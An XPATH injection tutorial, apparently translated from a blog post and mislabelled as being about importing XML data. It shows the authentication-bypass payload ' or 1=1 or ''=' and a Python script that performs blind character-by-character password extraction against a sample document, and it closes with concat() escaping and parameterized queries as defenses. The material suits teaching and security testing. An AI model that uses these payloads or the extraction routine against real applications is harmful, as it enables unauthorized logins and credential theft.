Importing XML data into a database
Code injection is a vulnerability with many faces, from SQL injection to OS command injection. These attacks happen because of a common programming mistake: letting user input pollute executable code.
Today, let's talk about a lesser-known type of code injection: injecting into XPATH queries.
XPATH is a query language for XML documents. Think SQL for XML.
XPATH provides the ability to navigate the XML document tree and select specific elements based on certain criteria.
For example, given an XML document:

    <?xml version="1.0" encoding="utf-8"?>
    <Employees>
      <employee id="1">
        <name>Kacey</name>
      </employee>
      <employee id="2">
        <name>Aaron</name>
      </employee>
    </Employees>

The XPATH expression below will select the ids of all employees:

    /Employees/employee/@id

While this XPATH expression will select the names of all employees:

    /Employees/employee/name/text()

As you can see, XPATH is very similar to SQL in terms of functionality, albeit with a slightly different syntax. The basic syntax of XPATH is like navigating the XML document using a file path: each `/` step descends one level, `@` selects an attribute, and `text()` selects an element's text content.
One major difference between XPATH and SQL is that XPATH is a standard language (a W3C specification) and is not implementation-dependent, whereas SQL has many dialects such as MySQL, MSSQL, PostgreSQL, and SQLite. This difference is significant because it means that exploiting an XPATH injection vulnerability is easier and potentially more scalable than exploiting SQL injection: attackers won't have to customize their payloads according to the dialect. The one thing to check is the XPATH version, since a payload that relies on XPATH 2.0 functions will fail against the many processors (libxml2, .NET's XmlDocument, the JDK's built-in XPath) that only implement XPATH 1.0.
XPATH can be used to query and perform operations on data stored in XML documents. For example, XPATH can be used to retrieve the salary information of employees stored in an XML document, and can also perform numeric operations or comparisons on that data.
XML documents are used as databases for their portability and their flexible, compatible structure.
From a security point of view, it is important to note that in real-life applications user data is seldom stored in XML documents. But communicating sensitive data across systems and web services is often done using XML, so those places are more often vulnerable.
XPATH injection is an attack that injects into XPATH expressions in order to alter the outcome of the query. Similar to SQL injection, it can be used to bypass business logic, escalate user privileges, and leak sensitive data.
XPATH injection flaws occur when developers form dynamic XPATH queries using user input. Let's say we're working with an XML document like this (notice that Kacey is an admin while Aaron is not):

    <?xml version="1.0" encoding="utf-8"?>
    <Employees>
      <employee id="1">
        <name>Kacey</name>
        <username>kacey1</username>
        <password>s3cret</password>
        <admin>1</admin>
      </employee>
      <employee id="2">
        <name>Aaron</name>
        <username>aaron1</username>
        <password>p4ssw0rd</password>
        <admin>0</admin>
      </employee>
    </Employees>

A piece of code like this is vulnerable, as it concatenates user input into an XPATH expression to authenticate users:

    Employees.SelectNodes("//employee[username='" + USERINPUT.username + "' and password='" + USERINPUT.password + "']")

Because the credentials are stored as child elements, the predicate compares the `username` and `password` elements (an `@username` predicate would look for attributes and match nothing). During authentication, all is well if the user does not attempt anything funky and simply provides their username and password:

    Employees.SelectNodes("//employee[username='aaron1' and password='p4ssw0rd']")

But if the user is malicious and attempts to alter the logic of the query by providing the username `' or 1=1 or ''='` to mess with the XPATH processor:

    Employees.SelectNodes("//employee[username='' or 1=1 or ''='' and password='any password']")

In XPATH, `and` binds tighter than `or`, so the predicate reads `username='' or 1=1 or (''='' and password='any password')`. Since 1=1 is always true, the predicate is true for every employee and the query returns all employee nodes in document order; an application that takes the first match logs the attacker in as Kacey. And because Kacey has admin privileges on the application, the attacker gains admin privileges as well.
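The bypass above, and the data leak the same flaw enables, reproduced as an added example that is not part of the original post. It uses Python with lxml (an XPATH 1.0 processor) against the page's Employees document; the function names, the blind-extraction loop and its alphabet are this example's own assumptions, and Aaron's `<username>` element, which the page's sample omits, is supplied so that the normal login has a record to match:

```python
"""XPATH injection against the login check, reproduced with lxml."""
import string

from lxml import etree

# Constructed sample document: the page's Employees example, with Aaron's
# missing <username> element added so the normal login has a record to match.
EMPLOYEES_XML = b"""<?xml version="1.0" encoding="utf-8"?>
<Employees>
  <employee id="1">
    <name>Kacey</name>
    <username>kacey1</username>
    <password>s3cret</password>
    <admin>1</admin>
  </employee>
  <employee id="2">
    <name>Aaron</name>
    <username>aaron1</username>
    <password>p4ssw0rd</password>
    <admin>0</admin>
  </employee>
</Employees>
"""

ROOT = etree.fromstring(EMPLOYEES_XML)


def login_vulnerable(username: str, password: str) -> list[str]:
    """The page's vulnerable pattern: user input concatenated into the predicate.

    Returns the <name> of every employee the predicate matched; an application
    built this way treats the first entry as the logged-in user.
    """
    query = ("//employee[username='" + username
             + "' and password='" + password + "']")
    return [e.findtext("name") for e in ROOT.xpath(query)]


def is_admin(name: str) -> bool:
    """Assumed application logic: the <admin> flag of the named employee."""
    for employee in ROOT.iter("employee"):
        if employee.findtext("name") == name:
            return employee.findtext("admin") == "1"
    return False


def blind_extract_password(employee_index: int,
                           alphabet: str = string.ascii_letters + string.digits) -> str:
    """Recover the password of the employee at a 1-based position using only
    the yes/no outcome of login_vulnerable() as an oracle (assumed alphabet:
    ASCII letters and digits)."""

    def oracle(condition: str) -> bool:
        # The injected username closes the literal, adds the probe, and opens
        # a trailing "or ''='" that absorbs the application's own
        # "and password='x'", since 'and' binds tighter than 'or' in XPATH.
        payload = f"' or {condition} or ''='"
        return len(login_vulnerable(payload, "x")) > 0

    target = f"//employee[{employee_index}]/password"
    # Step 1: find the length with string-length() (bounded at 64 here).
    length = next((n for n in range(1, 65)
                   if oracle(f"string-length({target})={n}")), None)
    if length is None:
        raise RuntimeError("password longer than 64 characters or no such employee")
    # Step 2: one character per position; substring() positions are 1-based.
    recovered = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            if oracle(f"substring({target},{pos},1)='{ch}'"):
                recovered += ch
                break
        else:
            raise RuntimeError(f"character {pos} is outside the assumed alphabet")
    return recovered


if __name__ == "__main__":
    print(login_vulnerable("aaron1", "p4ssw0rd"))            # ['Aaron']
    names = login_vulnerable("' or 1=1 or ''='", "any password")
    print(names, "admin:", is_admin(names[0]))               # ['Kacey', 'Aaron'] admin: True
    print(blind_extract_password(1))                         # s3cret
```

The oracle only ever sees "logged in" or "not logged in"; that is enough to recover every password in the document one character at a time, which is the practical meaning of an XML document having no access control of its own.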
XPATH injection has very serious implications, just like SQL injection. But there is one key difference between SQL and XPATH that potentially makes XPATH injection even more dangerous.
SQL databases are often protected by user-based access controls: the application might be limited to certain tables, columns, and queries based on the rights of the database user it runs as. Within a single XML document there is no such concept: an XPATH query can reach every node the parser loaded, and the document itself carries no users or permissions. This means that a single XPATH injection flaw often leads to the compromise of the entire XML document, for example every employee's password in the document above.
The basics of XPATH injection apply to both XPATH 1.0 and XPATH 2.0. However, XPATH 2.0 expands the capabilities of XPATH 1.0, making XPATH injection vulnerabilities even more dangerous.
XPATH 2.0 is much more feature-rich than the older version. For security purposes, two features stand out in their exploitation potential.
First, XPATH 2.0 allows users to reference documents by URL, through the doc() function. This means the target of exploitation is no longer limited to the current document: attackers can try to retrieve any XML document whose location on the host is known and accessible to the server (whether the processor permits this depends on its configuration).
XPATH 2.0 also has a function, string-to-codepoints(), that converts a string to the sequence of Unicode code points that represents it. This simplifies the extraction of string data during exploitation, since each character can be tested as a number rather than against a character set.
There are two ways an application can protect against XPATH injection attacks: input sanitization and parameterized queries.
Applications can sanitize user input before inserting it into an XPATH query. For example, single and double quote characters should be disallowed or escaped to prevent user input from breaking out of the string literal. One caveat: XPATH 1.0 string literals have no escape character, so a quote cannot be escaped with a backslash the way it can in most programming languages. The options are to reject the quote characters (a strict allowlist such as `[A-Za-z0-9_]` for usernames is often appropriate) or to build the literal with concat(), combining single-quoted and double-quoted pieces so that each piece contains only the other kind of quote. XPATH 2.0 additionally allows a quote to be doubled inside a literal ('' inside a single-quoted string).
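The concat() construction, as an added example in Python that is not the page's code; `xpath_literal` and `login_query` are names chosen here, and the predicate is the page's login check:

```python
"""Building a safe XPATH 1.0 string literal when no variable binding is available."""


def xpath_literal(value: str) -> str:
    """Return an XPATH 1.0 expression that evaluates to exactly `value`.

    XPATH 1.0 literals have no escape character, so a value containing both
    quote kinds is split into pieces that each contain only one kind and is
    rejoined with concat().
    """
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    pieces = []
    for i, part in enumerate(value.split("'")):
        if i > 0:
            pieces.append("\"'\"")      # the single quote itself, double-quoted
        if part:
            pieces.append(f"'{part}'")  # a run with no single quote in it
    return "concat(" + ", ".join(pieces) + ")"


def login_query(username: str, password: str) -> str:
    """The page's login predicate with both inputs wrapped as literals."""
    return (f"//employee[username={xpath_literal(username)}"
            f" and password={xpath_literal(password)}]")


if __name__ == "__main__":
    print(login_query("' or 1=1 or ''='", "x"))
    # //employee[username="' or 1=1 or ''='" and password='x']
```

With the page's payload the username becomes a double-quoted literal and is compared as data, so the predicate matches nobody. Use this only when the XPATH API at hand offers no variable binding; a parameterized query is the better choice where one exists.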
A better way to prevent XPATH injection is parameterized queries: instead of building XPATH queries dynamically from user input, bind the input to XPATH variables, which the processor treats as data rather than as part of the expression.
So instead of using:

    Employees.SelectNodes("//employee[username='" + USERINPUT.username + "' and password='" + USERINPUT.password + "']")

Use this instead:

    Employees.SelectNodes("//employee[username=$username and password=$password]")

with `$username` and `$password` bound to the user-supplied values through the processor's variable mechanism (in Java, an XPathVariableResolver set on the XPath object; in .NET, SelectNodes resolves variables through a custom XsltContext passed in place of the namespace manager; lxml in Python takes them as keyword arguments). This is a much safer approach, since input sanitization can sometimes be bypassed with obscure characters, and it is often difficult for developers to account for all the possible bypasses.
XPATH injection, like SQL injection, is a very damaging vulnerability. But just like SQL injection, there are clear-cut ways to prevent it. As a developer, be sure to use parameterized queries in your XPATH expressions! And for pentesters, look out for where XML data is queried and test for possible XPATH injection vulnerabilities: a lone single quote that produces an error, and `' or 1=1 or ''='` that produces a login, are the classic first probes.
Hope you enjoyed learning about XPATH injection attacks. Thanks for reading.
Translated from: https://medium.com/swlh/hacking-xml-data-a64c870b0988